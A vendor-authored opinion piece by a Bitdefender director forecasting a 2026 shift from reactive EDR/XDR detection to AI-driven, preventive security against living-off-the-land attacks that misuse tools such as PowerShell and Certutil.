Author: Martin Zugec, Technical Solutions Director, Bitdefender

New technologies, new pace: cybercriminals’ skills are developing faster than ever. In 2026, companies will therefore undergo a fundamental change: away from reactive defence and towards proactive and preventive threat prevention. The compelling trigger for this shift is cybercriminals, who are increasingly exploiting vulnerabilities in edge networks and using living-off-the-land (LOTL) techniques. The latter aim to circumvent conventional endpoint protection defences unnoticed. Against this backdrop, IT security managers should spend the next twelve months creating IT environments that are deliberately designed to be hostile to attackers and counter them.

Hackers have learned to use these LOTL tools to specifically bypass the detection mechanisms of traditional EDR or XDR, or to completely disable EDR and XDR agents early in the attack chain. Recent analyses of around 700,000 security incidents show that 84 per cent of attacks are already based on LOTL techniques. Attackers rely on legitimate applications and existing tools within the victim’s IT system instead of using classic malware. As this makes it almost impossible to distinguish malicious activity from normal user behaviour, companies need to realign their security models: prevention-oriented approaches that dynamically reduce attack surfaces, control access rights granularly and stop threats before they even reach the detection level are becoming a necessity.

It is not detection accuracy, but the attack surface itself that is becoming the central arena of conflict.

For years, security strategies were based on the assumption that detecting and responding as quickly as possible would limit damage. However, this logic falls short as soon as attackers no longer rely on malware and their behaviour is hardly distinguishable from that of a legitimate user. LOTL techniques allow attackers to move undetected within the network using native operating system tools, extend privileges and move laterally – without triggering security alerts from traditional endpoint detection and response (EDR) and extended detection and response (XDR) systems.

Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) are now mature and widely used. They are increasingly taken for granted rather than seen as a differentiating feature. Although they remain indispensable, they are no longer sufficient on their own.

This is because cybercriminals are automating their own reconnaissance activities. They exploit newly published vulnerabilities within hours and use legitimate tools such as PowerShell, WMIC or Certutil to imitate trustworthy behaviour. Since these actions often leave no malware artefacts or suspicious binary files behind, even advanced EDR and XDR platforms can generate a large number of alerts with little informative value. This makes it increasingly difficult for security teams to distinguish real attacks from normal system behaviour.

AI as the engine for adaptive prevention at machine speed

A defining and necessary trend for 2026 will therefore be the use of AI-powered, adaptive prevention systems. These continuously secure IT environments based on real user behaviour and up-to-date information on threats. While prevention controls were often considered rigid or restrictive in the past, modern AI makes them precise, dynamic and scalable. Artificial intelligence learns how individual employees use applications and system tools. It flexibly adapts access rights to the everyday work requirements of individual users or devices and the resulting risk profiles, blocking risky actions from the outset. For example, an administrator can completely deny access to PowerShell for users who never use this tool.

For other users who regularly use it for legitimate tasks, AI can allow typical commands while rejecting encrypted or obfuscated commands with malicious context.

The result is a security architecture that continuously adapts. Attack vectors are closed at machine speed. The possibilities for escalating privileges or moving laterally within the victim’s network are significantly reduced. Because artificial intelligence systems operate autonomously and can recognise patterns across the entire IT environment, preventive security is proving to be the more efficient approach compared to using human analysts, who have to manually evaluate and, if necessary, process large numbers of alerts.

In 2026, proactive prevention will become the decisive discipline

Detection and response will remain indispensable in the future. However, next-generation preventive technologies designed to stop attacks that rely on trust-based techniques such as LOTL are increasingly complementing this approach. These approaches help security teams reduce unnecessary tools and excessive privileges and minimise lateral attack paths. They also prevent recurring, automated and scaled attack patterns from cybercriminal quasi-playbooks when each system behaves differently thanks to individual rules for users and devices. At the same time, they reduce alert fatigue through granular detection and classification of risks. Teams can focus on truly relevant threats while security controls are continuously adapted to real-time speed and user behaviour.

Stay ahead of the threats – instead of chasing after them

Companies are better equipped to deal with new attack methods if they no longer assume that detection is sufficient to counter highly automated and covert attacks. Those who rely exclusively on reactive measures accept unnecessary risks and depend on human reaction times in the face of machine-controlled attacks. However, those who reduce the attack surface, limit unnecessary tools, consistently control data access and use adaptive prevention mechanisms will lay the foundation for more resilient IT in 2026.

Image: Martin Zugec, Technical Solutions Director, Bitdefender. Image source: Bitdefender.